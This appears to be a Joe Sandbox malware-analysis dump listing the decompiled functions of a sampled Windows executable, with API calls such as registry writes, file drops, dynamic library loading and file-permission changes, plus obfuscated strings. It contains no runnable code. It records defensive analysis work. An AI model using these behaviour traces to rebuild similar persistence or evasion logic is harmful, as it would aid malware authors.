Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0042C8E9, Relevance: 4.5, APIs: 3, Instructions: 22

APIs

_strlen.LIBCMT ref: 0042C8EB
_GetPrimaryLen.LIBCMT ref: 0042C905
EnumSystemLocalesA.KERNEL32(0042C796,00000001,0042C996,00000083,?,000000BC,?,004270F1,?,000000BC,?), ref: 0042C914

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042C859, Relevance: 3.0, APIs: 2, Instructions: 14

APIs

_strlen.LIBCMT ref: 0042C859
EnumSystemLocalesA.KERNEL32(Function_0000D4C3,00000001), ref: 0042C871

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0042FC9F, Relevance: 1.6, APIs: 1, Instructions: 81

APIs

Part of subcall function 0041F3C3: __getptd.LIBCMT ref: 0041F3D6

___ascii_strnicmp.LIBCMT ref: 0042FD2D

Part of subcall function 00422D23: __isleadbyte_l.LIBCMT ref: 00422DB8
Part of subcall function 00422D23: ___crtLCMapStringA.LIBCMT ref: 00422E05

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00420488, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001446), ref: 0042048D

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 004080D2, Relevance: 94.8, APIs: 45, Strings: 9, Instructions: 317

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000001,00000000,00000005), ref: 00408119
HeapAlloc.KERNEL32(00000000), ref: 0040811C
GetShellWindow.USER32 ref: 00408138
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00408197
HeapAlloc.KERNEL32(00000000), ref: 0040819A
CreatePopupMenu.USER32 ref: 004081B6

Part of subcall function 004085E0: VirtualAlloc.KERNEL32(00000000,004081EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0040861B
Part of subcall function 004085E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408696

GetProcessHeap.KERNEL32(00000000,00000000), ref: 004081FE
HeapFree.KERNEL32(00000000), ref: 00408207
GetProcessHeap.KERNEL32(00000000,00000008), ref: 0040820C
HeapFree.KERNEL32(00000000), ref: 0040820F
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00408252
HeapAlloc.KERNEL32(00000000), ref: 00408255
CountClipboardFormats.USER32 ref: 0040826A
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 004082B8
HeapFree.KERNEL32(00000000), ref: 004082C1
GetProcessHeap.KERNEL32(00000000,?), ref: 004082CC
HeapFree.KERNEL32(00000000), ref: 004082CF
GetProcessHeap.KERNEL32(00000000,00000008), ref: 004082D4
HeapFree.KERNEL32(00000000), ref: 004082D7
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00408317
HeapAlloc.KERNEL32(00000000), ref: 0040831A
GetMessageExtraInfo.USER32 ref: 0040832F
GetProcessHeap.KERNEL32(00000000,?), ref: 0040837D
HeapFree.KERNEL32(00000000), ref: 00408386
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0040838D
GetProcessHeap.KERNEL32(00000008,00000016), ref: 004083D7
HeapAlloc.KERNEL32(00000000), ref: 004083DA
GetLastError.KERNEL32 ref: 004083EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408435
HeapFree.KERNEL32(00000000), ref: 0040843E
GetProcessHeap.KERNEL32(00000000,?), ref: 00408445
HeapFree.KERNEL32(00000000), ref: 00408448
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0040844F
HeapFree.KERNEL32(00000000), ref: 00408452
GetProcessHeap.KERNEL32(00000000,?), ref: 00408459
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408460
HeapFree.KERNEL32(00000000), ref: 00408469
GetProcessHeap.KERNEL32(00000000,?), ref: 00408470
HeapFree.KERNEL32(00000000), ref: 00408473
GetProcessHeap.KERNEL32(00000000,0000000B), ref: 0040847A
HeapFree.KERNEL32(00000000), ref: 0040847D
GetProcessHeap.KERNEL32(00000000,?), ref: 00408484
HeapFree.KERNEL32(00000000), ref: 00408487
GetProcessHeap.KERNEL32(00000000,00000008), ref: 0040848C
HeapFree.KERNEL32(00000000), ref: 0040848F

Strings

[##', xrefs: 004080FA
5WGK5, xrefs: 0040814E
,=P<, xrefs: 004083A8
29'', xrefs: 004083AF
P, xrefs: 004083C4
~*75, xrefs: 004083B6
LdPB, xrefs: 004083CA
P1, xrefs: 004083D1
!$X#, xrefs: 004083BD

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00408BB1, Relevance: 75.5, APIs: 38, Strings: 5, Instructions: 272

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408C1A
HeapAlloc.KERNEL32(00000000), ref: 00408C1D
GetShellWindow.USER32 ref: 00408C38
GetModuleHandleA.KERNEL32(00000000), ref: 00408C5E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408C74
HeapFree.KERNEL32(00000000), ref: 00408C77
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408CB0
HeapAlloc.KERNEL32(00000000), ref: 00408CB3
GetMessagePos.USER32 ref: 00408CD1

Part of subcall function 004077D7: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00407861
Part of subcall function 004077D7: SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,00408D00), ref: 00407876
Part of subcall function 004077D7: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 0040788E
Part of subcall function 004077D7: CloseHandle.KERNEL32(00000000), ref: 004078A7
Part of subcall function 004077D7: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000001,?,?,?,?,00408D00), ref: 004078C0
Part of subcall function 004077D7: HeapFree.KERNEL32(00000000), ref: 004078C7

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408D1C
HeapFree.KERNEL32(00000000), ref: 00408D25
GetProcessHeap.KERNEL32(00000000,?), ref: 00408D2A
HeapFree.KERNEL32(00000000), ref: 00408D2D
GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408D70
HeapAlloc.KERNEL32(00000000), ref: 00408D73
GetCaretBlinkTime.USER32 ref: 00408D8A
GetProcessHeap.KERNEL32(00000000,?), ref: 00408DDA
HeapFree.KERNEL32(00000000), ref: 00408DE3
GetProcessHeap.KERNEL32(00000000,?), ref: 00408DEE
HeapFree.KERNEL32(00000000), ref: 00408DF1
GetProcessHeap.KERNEL32(00000000,?), ref: 00408DF6
HeapFree.KERNEL32(00000000), ref: 00408DF9
GetProcessHeap.KERNEL32(00000008,00000018), ref: 00408E3E
HeapAlloc.KERNEL32(00000000), ref: 00408E41
GetCapture.USER32 ref: 00408E55
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EA0
HeapFree.KERNEL32(00000000), ref: 00408EA9
GetProcessHeap.KERNEL32(00000000,?), ref: 00408EB0
HeapFree.KERNEL32(00000000), ref: 00408EB3
GetProcessHeap.KERNEL32(00000000,?), ref: 00408EBA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408EC5
HeapFree.KERNEL32(00000000), ref: 00408ECE
GetProcessHeap.KERNEL32(00000000,?), ref: 00408ED5
HeapFree.KERNEL32(00000000), ref: 00408ED8
GetProcessHeap.KERNEL32(00000000,?), ref: 00408EDF
HeapFree.KERNEL32(00000000), ref: 00408EE2
GetProcessHeap.KERNEL32(00000000,?), ref: 00408EE7
HeapFree.KERNEL32(00000000), ref: 00408EEA

Strings

B;^1, xrefs: 00408E12
5WGK5, xrefs: 00408C4E
7, xrefs: 00408E2D
ISoc2x, xrefs: 00408CE7
[##', xrefs: 00408BFB

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040110C, Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 305

APIs

GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00401176
HeapAlloc.KERNEL32(00000000), ref: 00401179
CountClipboardFormats.USER32 ref: 0040119F
GetProcessHeap.KERNEL32(00000008,000000C1), ref: 004012C8
HeapAlloc.KERNEL32(00000000), ref: 004012CB
GetDialogBaseUnits.USER32 ref: 004012EA

Part of subcall function 004038F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0040131B,00000000,0040131B,00000000,00000001,?,0040131B,00020006), ref: 00403929
Part of subcall function 004038F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0040131B,0040131B,?,0040131B,00020006), ref: 0040393C

GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00401356
HeapAlloc.KERNEL32(00000000), ref: 00401359
GetDialogBaseUnits.USER32 ref: 00401372
GetProcessHeap.KERNEL32(00000008,00000019), ref: 004013C4
HeapAlloc.KERNEL32(00000000), ref: 004013C7
GetCurrentThreadId.KERNEL32 ref: 004013E0
GetProcessHeap.KERNEL32(00000008,00000025), ref: 0040143F
HeapAlloc.KERNEL32(00000000), ref: 00401442
ReleaseCapture.USER32 ref: 00401458
RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0040149A
RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 004014CE
RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00401500
RegCloseKey.ADVAPI32(00000006), ref: 00401505
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401515
HeapFree.KERNEL32(00000000), ref: 0040151E
GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00401524
HeapFree.KERNEL32(00000000), ref: 00401527
GetProcessHeap.KERNEL32(00000000,?), ref: 0040152D
HeapFree.KERNEL32(00000000), ref: 00401530
GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00401542
HeapFree.KERNEL32(00000000), ref: 0040154B
GetProcessHeap.KERNEL32(00000000,?), ref: 00401551
HeapFree.KERNEL32(00000000), ref: 00401554

Strings

:N, xrefs: 004013E6
0Q#w, xrefs: 00401336
X!a1, xrefs: 00401256
VJ(, xrefs: 00401378
foAQ, xrefs: 00401434
R6X-, xrefs: 004012A2
5o$Q, xrefs: 00401412
RX#, xrefs: 00401248
sQLw, xrefs: 0040134B
/Quf, xrefs: 00401427
8Do, xrefs: 00401420

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004041E5, Relevance: 70.3, APIs: 32, Strings: 8, Instructions: 269

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,001CFDA8), ref: 00404237
HeapAlloc.KERNEL32(00000000), ref: 0040423A
GetShellWindow.USER32 ref: 00404255
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 004042AC
HeapAlloc.KERNEL32(00000000), ref: 004042AF
GetDoubleClickTime.USER32 ref: 004042CD
LoadLibraryA.KERNEL32(?), ref: 004042F7
GetProcAddress.KERNEL32(00000000), ref: 004042FE
GetProcessHeap.KERNEL32(00000008,00000014), ref: 00404376
HeapAlloc.KERNEL32(00000000), ref: 00404379
GetDialogBaseUnits.USER32 ref: 00404390
LoadLibraryA.KERNEL32(?), ref: 004043BA
GetProcAddress.KERNEL32(00000000), ref: 004043C1
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00404419
HeapAlloc.KERNEL32(00000000), ref: 0040441C
CloseClipboard.USER32 ref: 00404433
LoadLibraryA.KERNEL32(?), ref: 0040445D
GetProcAddress.KERNEL32(00000000), ref: 00404464
GetProcessHeap.KERNEL32(00000008,00401A39), ref: 00404487
HeapAlloc.KERNEL32(00000000), ref: 0040448A
GetProcessHeap.KERNEL32(00000000,00000005), ref: 004044C8
HeapFree.KERNEL32(00000000), ref: 004044CB
CloseHandle.KERNEL32(?), ref: 004044D4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044DD
HeapFree.KERNEL32(00000000), ref: 004044E0
CloseHandle.KERNEL32(?), ref: 004044EC
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004044F5
HeapFree.KERNEL32(00000000), ref: 004044F8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404504
HeapFree.KERNEL32(00000000), ref: 0040450D
GetProcessHeap.KERNEL32(00000000,?), ref: 00404512
HeapFree.KERNEL32(00000000), ref: 00404515

Strings

[##', xrefs: 00404218
5WGK, xrefs: 0040422C
D'D, xrefs: 00404344
,@a,, xrefs: 004043E4
X^_, xrefs: 00404400
v70Y, xrefs: 0040440E
W3h4, xrefs: 0040436B
[72@, xrefs: 00404352

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00408F05, Relevance: 70.3, APIs: 35, Strings: 5, Instructions: 265

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,?,?), ref: 00408F71
HeapAlloc.KERNEL32(00000000), ref: 00408F74
GetShellWindow.USER32 ref: 00408F8F
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00408FE5
HeapAlloc.KERNEL32(00000000), ref: 00408FE8
GetMessagePos.USER32 ref: 00409006

Part of subcall function 004085E0: VirtualAlloc.KERNEL32(00000000,004081EC,00003000,00000004,00000000,00000008,76E6FE8D), ref: 0040861B
Part of subcall function 004085E0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?,?,?,004081EC,00000000), ref: 00408696

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409052
HeapFree.KERNEL32(00000000), ref: 0040905B
GetProcessHeap.KERNEL32(00000000,?), ref: 00409060
HeapFree.KERNEL32(00000000), ref: 00409063
GetProcessHeap.KERNEL32(00000008,00000018), ref: 004090A9
HeapAlloc.KERNEL32(00000000), ref: 004090AC
GetCaretBlinkTime.USER32 ref: 004090C3
GetProcessHeap.KERNEL32(00000000,?), ref: 00409114
HeapFree.KERNEL32(00000000), ref: 0040911D
GetProcessHeap.KERNEL32(00000000,?), ref: 00409128
HeapFree.KERNEL32(00000000), ref: 0040912B
GetProcessHeap.KERNEL32(00000000,?), ref: 00409130
HeapFree.KERNEL32(00000000), ref: 00409133
GetProcessHeap.KERNEL32(00000008,00000018), ref: 00409178
HeapAlloc.KERNEL32(00000000), ref: 0040917B
GetCapture.USER32 ref: 0040918F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004091DB
HeapFree.KERNEL32(00000000), ref: 004091E4
GetProcessHeap.KERNEL32(00000000,?), ref: 004091EB
HeapFree.KERNEL32(00000000), ref: 004091EE
GetProcessHeap.KERNEL32(00000000,?), ref: 004091F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00409200
HeapFree.KERNEL32(00000000), ref: 00409209
GetProcessHeap.KERNEL32(00000000,?), ref: 00409210
HeapFree.KERNEL32(00000000), ref: 00409213
GetProcessHeap.KERNEL32(00000000,?), ref: 0040921A
HeapFree.KERNEL32(00000000), ref: 0040921D
GetProcessHeap.KERNEL32(00000000,?), ref: 00409222
HeapFree.KERNEL32(00000000), ref: 00409225

Strings

7, xrefs: 00409167
B;^1, xrefs: 0040914C
5WGK5, xrefs: 00408FA5
ISoc2x, xrefs: 0040901C
[##', xrefs: 00408F52

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004016A9, Relevance: 65.0, APIs: 23, Strings: 14, Instructions: 228

APIs

GetProcessHeap.KERNEL32(00000008,00000208,7142434B), ref: 004016C4
HeapAlloc.KERNEL32(00000000), ref: 004016C7

Part of subcall function 0040E684: GetModuleHandleA.KERNEL32(?,?), ref: 0040E6BD
Part of subcall function 0040E684: GetProcAddress.KERNEL32(00000000), ref: 0040E6C4

GetProcessHeap.KERNEL32(00000008,0000009D), ref: 004017AA
HeapAlloc.KERNEL32(00000000), ref: 004017AD
GetActiveWindow.USER32 ref: 004017C1
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 004017F0
GetProcessHeap.KERNEL32(00000008,00000039), ref: 00401836
HeapAlloc.KERNEL32(00000000), ref: 0040183D
GetCaretBlinkTime.USER32 ref: 00401854
StrStrIW.SHLWAPI(?,00000000), ref: 0040187E
GetProcessHeap.KERNEL32(00000008,00000051), ref: 004018ED
HeapAlloc.KERNEL32(00000000), ref: 004018F4
GetModuleHandleW.KERNEL32(00000000), ref: 0040190A
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00401939
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401942
HeapFree.KERNEL32(00000000), ref: 00401949
StrCatW.SHLWAPI(?), ref: 0040195C

Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0

HeapFree.KERNEL32(00000000), ref: 004019BB

Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00408799
Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 0040879C
Part of subcall function 00408761: GetTickCount.KERNEL32 ref: 004087B8
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00408804
Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408807
Part of subcall function 00408761: GetCapture.USER32 ref: 00408819
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040886A
Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408871
Part of subcall function 00408761: GetCursor.USER32 ref: 00408885
Part of subcall function 00408761: LoadLibraryA.KERNEL32(66713859), ref: 004088B6
Part of subcall function 00408761: GetProcAddress.KERNEL32(00000000), ref: 004088BD
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004088DF
Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088EC
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 004088F7
Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088FA
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,?), ref: 00408901
Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 00408904

Part of subcall function 0040D8BA: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0040D8EA
Part of subcall function 0040D8BA: SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0040D920
Part of subcall function 0040D8BA: LocalAlloc.KERNEL32(00000040,00000014), ref: 0040D92A
Part of subcall function 0040D8BA: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0040D934
Part of subcall function 0040D8BA: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0040D941
Part of subcall function 0040D8BA: SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0040D94B
Part of subcall function 0040D8BA: FreeSid.ADVAPI32(00000000), ref: 0040D95A
Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D96F
Part of subcall function 0040D8BA: LocalFree.KERNEL32(00000000), ref: 0040D976

Part of subcall function 00401560: StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401992), ref: 0040158B
Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000008,00000015), ref: 004015D6
Part of subcall function 00401560: HeapAlloc.KERNEL32(00000000), ref: 004015D9
Part of subcall function 00401560: GetClipboardViewer.USER32 ref: 004015E8
Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401639
Part of subcall function 00401560: HeapFree.KERNEL32(00000000), ref: 0040163C
Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040166C
Part of subcall function 00401560: HeapFree.KERNEL32(00000000), ref: 0040166F
Part of subcall function 00401560: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00401992), ref: 0040167A
Part of subcall function 00401560: HeapFree.KERNEL32(00000000), ref: 0040167D

GetProcessHeap.KERNEL32(00000000,?), ref: 0040199E
HeapFree.KERNEL32(00000000), ref: 004019A1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004019AA
HeapFree.KERNEL32(00000000), ref: 004019B3
GetProcessHeap.KERNEL32(00000000,?), ref: 004019B8

Strings

J+df, xrefs: 00401792
!J6d, xrefs: 00401714
CN)J, xrefs: 0040171B
KCBq, xrefs: 004018E2
q;K,, xrefs: 004018AE
PJ6d, xrefs: 004016EB
TelI, xrefs: 00401824
i.C/, xrefs: 004018A7
6N%J, xrefs: 004016F4
3d'N, xrefs: 00401700
JWd#, xrefs: 0040176F
i8C), xrefs: 004018CA
Cgq5, xrefs: 004018BC
97Ce, xrefs: 0040180F

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040890F, Relevance: 63.2, APIs: 29, Strings: 7, Instructions: 206

APIs

lstrlenW.KERNEL32(001CFDA8,76AD46E9,7142434B,76E6FE8D), ref: 00408921
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00408941
HeapAlloc.KERNEL32(00000000), ref: 00408944
GetProcessHeap.KERNEL32(00000008,?), ref: 00408963
HeapAlloc.KERNEL32(00000000), ref: 00408966
lstrcpyW.KERNEL32(00000000,?), ref: 0040897B
GetProcessHeap.KERNEL32(00000008,00000021), ref: 004089BB
HeapAlloc.KERNEL32(00000000), ref: 004089BE
GetClipboardOwner.USER32 ref: 004089D2
GetTickCount.KERNEL32(00000005), ref: 004089FE
wsprintfW.USER32 ref: 00408A0F
wsprintfW.USER32 ref: 00408A1F
GetProcessHeap.KERNEL32(00000008,00000104), ref: 00408A33
HeapAlloc.KERNEL32(00000000), ref: 00408A36
GetTickCount.KERNEL32 ref: 00408A47
GetProcessHeap.KERNEL32(00000008,00000044), ref: 00408AE0
HeapAlloc.KERNEL32(00000000), ref: 00408AE3
GetClipboardSequenceNumber.USER32 ref: 00408AF7
wsprintfA.USER32 ref: 00408B2D

Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0

HeapFree.KERNEL32(00000000), ref: 00408B79

Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00408799
Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 0040879C
Part of subcall function 00408761: GetTickCount.KERNEL32 ref: 004087B8
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00408804
Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408807
Part of subcall function 00408761: GetCapture.USER32 ref: 00408819
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040886A
Part of subcall function 00408761: HeapAlloc.KERNEL32(00000000), ref: 00408871
Part of subcall function 00408761: GetCursor.USER32 ref: 00408885
Part of subcall function 00408761: LoadLibraryA.KERNEL32(66713859), ref: 004088B6
Part of subcall function 00408761: GetProcAddress.KERNEL32(00000000), ref: 004088BD
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004088DF
Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088EC
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,66713859), ref: 004088F7
Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 004088FA
Part of subcall function 00408761: GetProcessHeap.KERNEL32(00000000,?), ref: 00408901
Part of subcall function 00408761: HeapFree.KERNEL32(00000000), ref: 00408904

GetProcessHeap.KERNEL32(00000000,?), ref: 00408B60
HeapFree.KERNEL32(00000000), ref: 00408B67
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B76
GetProcessHeap.KERNEL32(00000000,?), ref: 00408B84
HeapFree.KERNEL32(00000000), ref: 00408B87
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B90
HeapFree.KERNEL32(00000000), ref: 00408B93
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408B9F
HeapFree.KERNEL32(00000000), ref: 00408BA2

Strings

UDD, xrefs: 00408AB4
"%s", xrefs: 00408A17
C\DA, xrefs: 00408AA6
KCBqiNhR7x, xrefs: 0040890F
PDID, xrefs: 00408A6F
XlCI, xrefs: 00408AC2
xIfy, xrefs: 00408AD3

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040485C, Relevance: 63.2, APIs: 27, Strings: 9, Instructions: 193

APIs

GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
HeapAlloc.KERNEL32(00000000), ref: 00404881
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
HeapAlloc.KERNEL32(00000000), ref: 0040489D
OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
GetLastError.KERNEL32 ref: 00404944
